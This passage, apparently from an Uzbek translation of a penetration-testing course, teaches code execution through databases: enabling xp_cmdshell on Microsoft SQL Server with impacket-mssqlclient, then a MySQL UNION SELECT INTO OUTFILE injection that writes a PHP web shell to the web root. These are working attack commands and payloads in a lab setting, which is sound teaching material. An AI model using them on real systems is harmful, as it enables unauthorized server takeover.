10.3.1. Manual Code Execution

Ma'lumotlar bazasining qaysi tizimiga hujum qilayotganimizga qarab, kod bajarilishiga erishish strategiyamizni moslashtirishimiz kerak bo‘ladi.

Microsoft SQL Server tizimida xp_cmdshell funksiyasi satr ko‘rinishidagi buyruqni operatsion tizimning buyruqlar qobig‘iga uzatadi va u yerdan olingan natijani matnli satrlar sifatida qaytaradi. Bu funksiya standart holatda o‘chirib qo‘yilgan bo‘ladi va uni faollashtirgach, SELECT emas, EXECUTE kalit so‘zi yordamida chaqirish kerak bo‘ladi.

Bizning ma’lumotlar bazamizda Administrator foydalanuvchisi tegishli ruxsatlarga ega. Keling, SQL injection ni taqlid qilib, impacket-mssqlclient vositasi yordamida xp_cmdshell funksiyasini faollashtiramiz:

kali@kali:~$ impacket-mssqlclient <Administrator:[email protected]> -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
SQL> EXECUTE sp_configure 'show advanced options', 1;
[*] INFO(SQL01\\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;

Listing 27 - xp_cmdshell funksiyasini yoqish

Kali VM dan MSSQL instansiyasiga kirgach, show advanced options ni 1 ga o‘zgartirib, RECONFIGURE buyrug‘i orqali o‘zgarishni amaldagi konfiguratsiyaga tatbiq etdik. Keyin, xp_cmdshell funksiyasini yoqib, yana RECONFIGURE buyrug‘i bilan o‘zgartirishni kuchga kiritdik.

Endi bu funksiyani yoqib, EXECUTE bayonoti va funksiya nomi yordamida istalgan Windows shell buyrug‘ini bajarishimiz mumkin:

SQL> EXECUTE xp_cmdshell 'whoami';
output

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

nt service\\mssql$sqlexpress

NULL

Listing 28 - xp_cmdshell orqali buyruq bajarish

Endi tizimga to‘liq nazoratga ega bo‘lganimiz sababli, SQL shell ni standart reverse shell ga yangilashimiz oson.

Endi esa MySQL ma’lumotlar bazasiga o‘tamiz.

Turli MySQL versiyalarida RCE ga olib boruvchi yagona funksiya mavjud bo‘lmasa-da, SELECT INTO_OUTFILE bayonotidan foydalanib, web serverda fayl yozish orqali bu imkoniyatdan foydalanishimiz mumkin.

Bu hujum ishlashi uchun fayl yoziladigan joyni ma’lumotlar bazasi dasturi ishlayotgan operatsion tizim foydalanuvchisi yozish huquqiga ega bo‘lishi kerak.

Masalan, avval o‘rganganimiz UNION so‘rovi asosida MySQL maqsadli ilovasiga webshell.php yozamiz.

Birinchi ustunga PHP kodining satrini joylab, yoziladigan fayl sifatida /var/www/html/tmp/webshell.php yo‘lini ko‘rsatamiz:

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

Listing 29 - INTO OUTFILE direktivasi orqali WebShell yozish

Yozilgan PHP kod fayli quyidagicha ko‘rinadi:

<? system($_REQUEST['cmd']); ?>

Listing 30 - PHP reverse shell